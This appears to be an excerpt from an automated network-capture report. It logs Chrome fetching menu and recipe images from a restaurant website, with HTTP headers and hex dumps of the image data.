                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 37 00 00 00 40 08 06 00 00 00 be fc ef 3f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3b 6a 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR7@?pHYs;jiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:52 UTC1233INData Raw: 46 ca bd 32 4b d2 86 00 97 c9 c6 65 58 a0 3a 17 15 d3 b9 14 a9 ee 92 16 47 96 aa d2 22 bb 45 52 57 c3 06 48 ea 29 e9 15 eb 0c 36 1a 47 9a a3 0d b7 11 09 75 ef 66 e3 73 be fb 43 dc 7f 44 d2 58 3f 9f 9b 97 cf 85 1e 7e ab e3 3c 80 b3 83 d8 b2 8f 43 a3 d4 c9 af 04 2e 74 e0 fa 8c 61 07 8f 42 be b6 c2 62 da 2f 80 3d 6a 5f 9c e6 95 cf 1b 97 d1 c0 0d 51 ba 56 b4 cc d0 25 88 d7 06 f9 de d5 f7 fa 88 80 de c0 46 a7 31 47 ab 6d b5 53 af 0a 22 98 b5 de 7b 48 c0 88 09 c0 1e a7 53 fb 8b 85 5f 61 eb 68 a5 26 88 f0 d3 44 70 4f c6 fc a6 56 a4 2a 6d 69 15 be 0e 44 38 ae 71 64 92 b6 c5 c0 0f 8b 25 c9 59 c4 b5 0f 4e ad da d1 77 2a 8a 55 19 31 e6 09 47 b9 fe d9 d7 a9 d7 f6 08 be ce 59 4b 98 d1 bf 1a 64 f9 95 ad 21 ae 22 88 b4 bb 3b 26 6c b4 e8 9d 12 cd d9 e3 0d db 1d 45 e2 7a
                                                                                                                                                    Data Ascii: F2KeX:G"ERWH)6GufsCDX?~<C.taBb/=j_QV%F1GmS"{HS_ah&DpOV*miD8qd%YNw*U1GYKd!";&lEz


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    99192.168.2.449866162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC658OUTGET /assets/imgs/img_recipe_2.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:52 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:52 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 21:27:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 199934
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:52 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: ff d8 ff e1 11 71 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 01 f4 00 00 01 01 00 03 00 00 00 01 08 3d 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 2d c6 c0 00 00 27 10 00 2d c6 c0 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 30 39 3a 32 37 20 31 37 3a 32 37 3a 31 36 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: qExifMM*=(1"2i$-'-'Adobe Photoshop CC 2015 (Windows)2023:09:27 17:27:16
                                                                                                                                                    2024-10-01 04:26:52 UTC6016INData Raw: ae 03 ba 03 c7 03 d3 03 e0 03 ec 03 f9 04 06 04 13 04 20 04 2d 04 3b 04 48 04 55 04 63 04 71 04 7e 04 8c 04 9a 04 a8 04 b6 04 c4 04 d3 04 e1 04 f0 04 fe 05 0d 05 1c 05 2b 05 3a 05 49 05 58 05 67 05 77 05 86 05 96 05 a6 05 b5 05 c5 05 d5 05 e5 05 f6 06 06 06 16 06 27 06 37 06 48 06 59 06 6a 06 7b 06 8c 06 9d 06 af 06 c0 06 d1 06 e3 06 f5 07 07 07 19 07 2b 07 3d 07 4f 07 61 07 74 07 86 07 99 07 ac 07 bf 07 d2 07 e5 07 f8 08 0b 08 1f 08 32 08 46 08 5a 08 6e 08 82 08 96 08 aa 08 be 08 d2 08 e7 08 fb 09 10 09 25 09 3a 09 4f 09 64 09 79 09 8f 09 a4 09 ba 09 cf 09 e5 09 fb 0a 11 0a 27 0a 3d 0a 54 0a 6a 0a 81 0a 98 0a ae 0a c5 0a dc 0a f3 0b 0b 0b 22 0b 39 0b 51 0b 69 0b 80 0b 98 0b b0 0b c8 0b e1 0b f9 0c 12 0c 2a 0c 43 0c 5c 0c 75 0c 8e 0c a7 0c c0 0c d9 0c f3
                                                                                                                                                    Data Ascii: -;HUcq~+:IXgw'7HYj{+=Oat2FZn%:Ody'=Tj"9Qi*C\u
                                                                                                                                                    2024-10-01 04:26:52 UTC2176INData Raw: 36 b5 3a 5c 24 c8 06 e3 5e 8a e8 51 f1 74 7b 95 eb a6 22 9b 23 9f 09 7a 06 95 57 93 80 1a e0 d6 81 86 f0 19 4d fd 94 3b 28 3f 96 ae b6 75 e0 16 8c 67 f4 21 e7 79 96 fc 9d 15 d5 ac f9 71 7b d7 53 3f 2b 17 07 ff d4 f3 9c 89 bb 81 22 da 36 ea d6 20 96 f1 77 bf 56 83 96 47 72 49 53 af 0d 0d 6b 79 8c e3 28 7c ce 41 f3 25 36 b9 03 ec ae d4 f8 6a 5e 45 34 8c 8e 93 0d 46 88 1b bd b7 de 7f 75 be 1a e6 3b 3f 0b 06 8a 6e ad 9c 34 67 71 94 63 a0 71 72 49 53 6e aa b3 cd 09 3d fc a6 b8 70 74 b6 a2 8d e7 73 45 08 55 3b 54 13 da e8 bd 56 2e 7c 28 6f 2f 64 70 de 06 95 55 ed 6e 51 97 d8 b2 4f 04 59 3c 91 5e 10 8b 2b 31 23 a4 55 13 f2 3e 6a 0f ff 00 6d 36 bc 08 5b 8a d7 c5 3c a8 c6 d6 b1 17 f6 50 fc cb 9d 67 ac 4d f2 d2 bc 65 56 e0 5f a6 9d 4d 8e b8 15 4b b9 49 19 ac 39 e4
                                                                                                                                                    Data Ascii: 6:\$^Qt{"#zWM;(?ug!yq{S?+"6 wVGrISky(|A%6j^E4Fu;?n4gqcqrISn=ptsEU;TV.|(o/dpUnQOY<^+1#U>jm6[<PgMeV_MKI9
                                                                                                                                                    2024-10-01 04:26:52 UTC16384INData Raw: 6a b3 2f e0 c9 ec d6 36 4c 72 17 0a 51 c8 2d 42 e3 83 46 8a d2 65 62 57 3b a4 48 d2 be 81 01 63 f4 01 4b c7 4a cc fe 20 f3 3f e9 7c 8e 77 53 67 9a d0 af da ff 00 0d 55 ad d6 ad 85 4a f6 b2 5f 53 ce 27 c9 6e 61 3c b9 67 8c ce ce 3e 8f 0d 3d 34 fc 95 4f ca a4 70 8a 1b a0 5b f3 55 a2 37 1a e0 6c 7d 9b b7 cb 3b 09 75 aa 44 ef 29 02 a3 12 33 71 35 13 3d cd 2a b5 52 40 b2 5a 91 5e d5 05 e9 6f 47 05 04 ee 14 81 fa 2a 1d da 53 43 6b 42 cb 0a bd 36 d5 0a b5 ea 44 24 d5 10 61 3a d2 86 bd 49 22 02 b6 14 39 3b 4d b8 da ad 2c 12 49 d4 d3 c8 b5 40 af 4a 64 35 44 1c da 52 a5 cd 46 5e f4 e4 6a 84 1f 2b 85 b0 a8 4c c0 9b 0a 49 cd 8d 08 ac 2f a5 1a 20 6e fa 4d f5 08 7b d3 89 aa 65 42 25 dd 4f 0f 43 de d4 e0 f5 52 c8 c2 51 f5 a2 a2 9a d5 58 25 b7 1a 95 a7 51 aa 53 2b 22 dc
                                                                                                                                                    Data Ascii: j/6LrQ-BFebW;HcKJ ?|wSgUJ_S'na<g>=4Op[U7l};uD)3q5=*R@Z^oG*SCkB6D$a:I"9;M,I@Jd5DRF^j+LI/ nM{eB%OCRQX%QS+"
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 08 74 b7 b2 a2 cd c9 19 33 bb 33 70 36 b1 f6 53 f1 94 64 63 ac 11 82 2e 6f b8 8d 2b a9 0f a2 6d 9c 1b 5f fe 79 f8 60 b9 d7 2b e6 5f 6a b1 d0 1e 36 f7 a8 48 a0 f3 a5 11 c2 37 00 2e 7d b5 a3 87 d3 4b 3c 47 22 5c 81 b9 af 65 b6 97 15 46 f1 49 82 de 51 36 61 d3 f4 d1 53 65 61 d6 af 27 59 70 99 2b 4c 09 0c a3 68 b5 b4 d2 d6 a9 79 7e 3c 44 3c d2 1e 06 d6 a1 00 b0 d7 a6 a5 44 4f 25 a4 60 c6 de 2f 0f e8 d0 b5 29 af 90 dc 2c 84 3c c2 76 2d 08 21 17 ae 9e da 8b f4 54 1c bb 22 4c d2 31 a0 20 00 7a 45 17 9f 89 95 8c db 5c 2b 0b 02 18 70 35 4f ed 70 ce 46 ea 5e f7 c3 fd 08 40 16 ea f6 8a 23 1c b4 8c 02 16 0c 3b ad b8 e9 4c f2 24 45 06 4b 5c f4 0a 33 97 e2 48 d2 10 48 12 1e e9 f0 a8 f7 df df 6a 53 b5 54 87 ab d6 de ec b9 82 1c 58 26 39 05 f2 2e da 1d 5a e6 e4 d6 97 0b
                                                                                                                                                    Data Ascii: t33p6Sdc.o+m_y`+_j6H7.}K<G"\eFIQ6aSea'Yp+Lhy~<D<DO%`/),<v-!T"L1 zE\+p5OpF^@#;L$EK\3HHjSTX&9.Z
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 3c c8 4b 30 b8 03 41 c3 f6 a9 bc 93 9b ac 6e 39 74 f2 06 2b a4 72 1d 01 b7 f9 4d f1 2d 25 51 de bd aa dc ae 57 fd a5 59 c7 04 93 f2 18 51 4c 48 4c 6b 73 a8 d6 a8 32 bd 2d 95 1b c7 17 9c 26 59 09 db 7f 08 1e 26 ab 89 e5 97 2f 21 e3 c6 62 54 df 89 d0 0f 15 01 13 64 44 db b1 6e cf dd b8 17 b8 f8 29 fa af 7a 37 9c 3e 13 27 e3 98 64 18 c8 b1 c8 cb a4 6c 01 01 81 bd 88 fe 2a ba e4 73 b6 5b 97 73 f7 89 6d 4f 4d 67 e4 95 96 7b ca 02 6e d6 c3 87 fc d4 56 0e 6e 2c 2c f1 bb b5 a4 16 24 0b db ea d4 dd ad ec ab 8e 63 0c 63 6a a5 ef 3b ce 8d b1 cc 0c d7 20 ea c3 81 07 e2 f8 6b 1b 9a 64 2e ad 11 3a 0d ab 71 a1 14 70 63 9f 28 c5 8c ec 5b dc 93 c6 c2 af 20 e4 b8 f1 4a b3 6c 2e 53 5b df f7 6a a9 7a 7a a9 2b 72 c5 5e 2f c1 27 20 89 42 79 0a 2d 75 bd ff 00 6b b5 57 7c ca 28
                                                                                                                                                    Data Ascii: <K0An9t+rM-%QWYQLHLks2-&Y&/!bTdDn)z7>'dl*s[smOMg{nVn,,$ccj; kd.:qpc([ Jl.S[jzz+r^/' By-ukW|(
                                                                                                                                                    2024-10-01 04:26:53 UTC16331INData Raw: b8 aa fb c9 07 b4 17 fd 1f 2f bd 57 18 fb 79 6e e8 f1 61 0e 25 00 ed 4b 02 b6 ef 79 8d de d9 55 b3 62 a7 ea 32 aa 72 5d 4b 97 3e 41 55 81 bc a1 ba ec 47 42 ff 00 a7 4c ce 96 2f 2f 7c 87 81 3c 7a bf 8a 9b e6 22 42 1a fb 43 dc 93 c7 87 8b ed 50 29 be 44 6c b9 d8 c5 1d 89 54 65 ff 00 f6 8f ee d6 3b 3b 5b 0f c8 55 85 c7 24 9c ba 28 79 a1 1e 4b dd 7c 4c 7a 3f c5 53 4d cb 7c b7 b4 2e 49 17 e2 2a 3c 6e 73 8d 95 8a 04 8a b0 cb 22 58 88 88 52 6d e2 a3 e0 c0 68 d6 31 29 11 c4 06 e2 49 d7 ed d5 db d5 d4 d2 4a b9 7e 4b 5b ef 57 96 51 65 e2 cb 8e be 6c 82 f1 8d 2f 41 01 7d 47 4d 69 79 a4 d1 e7 62 bc d8 e0 c9 1c 77 d0 0e 91 54 86 18 be 5c 48 03 06 0d 66 b0 d6 d6 f7 6b 36 df 56 da ed d6 b9 36 6a f6 55 97 dd c9 04 af 2c 8b e5 a0 1c 2c c0 1e f7 e9 54 09 34 90 27 94 aa cb
                                                                                                                                                    Data Ascii: /Wyna%KyUb2r]K>AUGBL//|<z"BCP)DlTe;;[U$(yK|Lz?SM|.I*<ns"XRmh1)IJ~K[WQel/A}GMiybwT\Hfk6V6jU,,T4'
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 82 6f b2 55 ea b9 2a e7 9a 5f 50 66 98 71 02 ec 8f b2 8c 5b 40 14 7d e3 7c 54 87 18 18 c0 70 09 53 63 ed ab 1c 68 63 c2 f2 b7 44 64 f2 45 91 10 58 fe 95 08 72 c6 5b c9 2e d2 97 27 b2 78 83 f1 53 fd ab 4a 56 aa 88 79 33 fa dc c3 f2 59 62 41 10 c7 58 a2 ee 28 3c 7a ea 90 7d d3 3e db 30 07 a3 50 7e d5 14 31 d7 32 22 80 91 22 5c a9 bd af f0 55 3f 29 0e 24 64 d8 4c 6a 48 7d 7b 86 a3 4f 6e 99 e6 cb f9 94 9a d7 b1 cf 0c 2a 6c b0 84 2b 46 0d f8 1b d0 eb 95 8e f7 32 29 1f 45 3b 2a 23 34 b6 8e e4 5b a6 a3 1c bd ba f8 d2 92 a5 56 70 cd 13 2f ed e0 22 2f 97 c9 6d 91 5d 8d 81 3b ba 0d 36 4c 55 56 20 a8 b8 d0 d0 b2 01 80 0c a0 d8 a8 d6 f5 47 2f 3f 99 d4 ba 5a c0 d8 dc ea 69 da f4 5f 6b 9d 6d c7 d4 0b 6d d7 af 16 34 47 19 78 85 b0 14 d9 99 10 04 7b 6b d1 d7 54 98 dc ec
                                                                                                                                                    Data Ascii: oU*_Pfq[@}|TpSchcDdEXr[.'xSJVy3YbAX(<z}>0P~12""\U?)$dLjH}{On*l+F2)E;*#4[Vp/"/m];6LUV G/?Zi_kmm4Gx{kT
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: db 71 a8 4f 76 35 f7 9f df a6 fa cf d4 bf d0 e0 58 21 60 32 b2 2e 13 e0 51 fc c9 db e1 5a c7 60 cd 8d cc d5 7c b3 e4 e4 0b ee 27 de ff 00 77 e1 97 fd 55 a4 6f db 1f 6d 4d 5a 34 cf dd 63 5b ca dc 9d d0 92 aa e0 77 6d 7b fc 7f 15 4a 99 38 50 48 56 50 d1 ca 78 b8 37 b5 56 61 49 91 8b b3 e6 90 87 23 89 d7 4f f6 a4 f1 54 79 c8 40 f3 45 ca 13 76 6b 70 fd e5 ac ca 5e 4d 73 98 f0 5c cb ce 73 31 1d a1 f3 96 48 d7 83 5a dc 7f 86 b2 fe bc 93 27 23 91 f9 b2 11 b7 1e 58 a4 04 37 10 1b f6 a8 a7 cd 59 90 b2 84 63 6e 20 eb f5 9b e2 a0 3d 47 9d 26 5f 2a c8 82 48 76 33 40 c2 e1 40 e1 e2 6e d6 dd d5 5d bf ea 47 55 98 47 a7 72 a9 04 d0 86 1c 1e 20 7f 38 ae 4a ab f4 7e 57 9f cb 31 25 bf 7a 05 1f ab b6 ad 06 86 ba 2b e7 e4 e6 3c 38 26 90 9d 87 67 7a da 56 5b 2b 91 c8 e8 19 c8
                                                                                                                                                    Data Ascii: qOv5X!`2.QZ`|'wUomMZ4c[wm{J8PHVPx7VaI#OTy@Evkp^Ms\s1HZ'#X7Ycn =G&_*Hv3@@n]GUGr 8J~W1%z+<8&gzV[+
                                                                                                                                                    2024-10-01 04:26:53 UTC8245INData Raw: 29 0a 00 e5 72 cc 1d ee 56 fa 9f 65 58 67 c9 85 2a a7 c8 a3 2b 0e 3b 87 1a 12 69 55 c8 21 76 9e 16 e8 14 a9 1c 8e db 63 52 58 70 02 ae 13 c9 49 8f 3b 76 03 7d cc dd e5 ea a6 a9 1b bb 44 85 e3 c6 a3 2d 23 48 4b 8b 13 c7 d9 5c cc 38 0a a6 83 ae 43 b5 e1 7e cf 0d d7 d2 ba 86 bf 66 d7 ec 71 b7 b6 ba aa 02 83 ff d6 c5 19 4f 4d 2a b6 b4 0e f2 6a 53 26 db 5f 4f a7 4a e4 ce 62 24 ea c2 41 e3 51 63 4d b5 a9 d8 b8 99 59 63 ee 21 96 4d 7c 2b 56 70 7a 5b 9c 4d c3 19 96 fc 37 30 14 ea eb bc 7e d1 0e f5 5e 4a 9a e2 2f 5a 28 fd 0d cd dc 76 c4 68 7d ad 45 a7 e1 ef 30 3a 34 d1 0f c8 4d 35 68 bb f1 02 ff 00 2d 7e 4c 81 5e ba 69 8e f5 b9 8f f0 df 20 f7 f2 47 e4 43 45 27 e1 ad c7 6e 77 3f 42 81 46 b4 5c a7 ba a7 9d 82 63 e9 34 f3 39 6d 0d 87 e5 af 4c 8f f0 cf 0f fc c6 95 be
                                                                                                                                                    Data Ascii: )rVeXg*+;iU!vcRXpI;v}D-#HK\8C~fqOM*jS&_OJb$AQcMYc!M|+Vpz[M70~^J/Z(vh}E0:4M5h-~L^i GCE'nw?BF\c49mL


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    100192.168.2.449867162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC664OUTGET /assets/imgs/food_menu_mainfood.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:52 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:52 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:22 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 19239
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:52 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:53 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 44 00 00 00 40 08 06 00 00 00 a3 82 d1 a4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3b 6a 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDRD@pHYs;jiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:53 UTC2855INData Raw: e5 8d 1c bf 5f 18 84 51 ae 45 d6 12 53 71 b1 60 0c 05 3e a7 2e 49 92 73 e6 cb 0d 51 3b 60 b8 a9 f9 41 81 41 fe b9 c6 f4 bd 1d 98 05 a4 00 17 a9 81 f6 0a 4a 89 c0 0d b1 98 5c a1 67 d5 b6 6d 53 3b 8d 77 dc 0b 1b 0b c8 49 4e e0 00 b0 d2 b8 bf d1 b0 69 ef 60 7e 61 ec 47 e9 f8 f3 86 c8 51 e0 2f 12 db 9b 4e 6e 8a 85 59 1f 99 7f b7 d9 a0 cc ba e4 8b 7a df c3 ba 79 4b c3 f4 47 d6 4a af 03 4b 4d f3 97 7b cf a7 cc 1e fb eb 98 5f 28 f1 4f d3 10 bb 1b 02 48 5b 89 a8 97 32 7d b6 9e 92 6b 07 6c 83 13 5e 14 a3 4d 7a 7b dc 32 c1 ca f3 f7 1e 96 ee a9 66 a6 76 86 c7 2e 3d 28 db 63 d6 03 cb 05 a6 d2 e2 71 67 d0 30 ea 14 78 60 8a e7 55 00 cf d5 d1 52 d8 25 17 4d d0 28 a3 1c 7f bd 01 f9 34 30 ce 18 fd 97 5d aa 4a e0 1f 12 60 61 0d 15 65 57 c3 28 dd 73 36 06 fb 3a e8 55 af 99
                                                                                                                                                    Data Ascii: _QESq`>.IsQ;`AAJ\gmS;wINi`~aGQ/NnYzyKGJKM{_(OH[2}kl^Mz{2fv.=(cqg0x`UR%M(40]J`aeW(s6:U


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    101192.168.2.449870162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:52 UTC397OUTGET /assets/imgs/menu_imges/Rice_with_Dhal.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:53 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:52 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 20:40:28 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 38109
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:52 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:53 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 75 00 00 00 4b 08 06 00 00 00 4e 74 c8 61 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRuKNtapHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:53 UTC5499INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
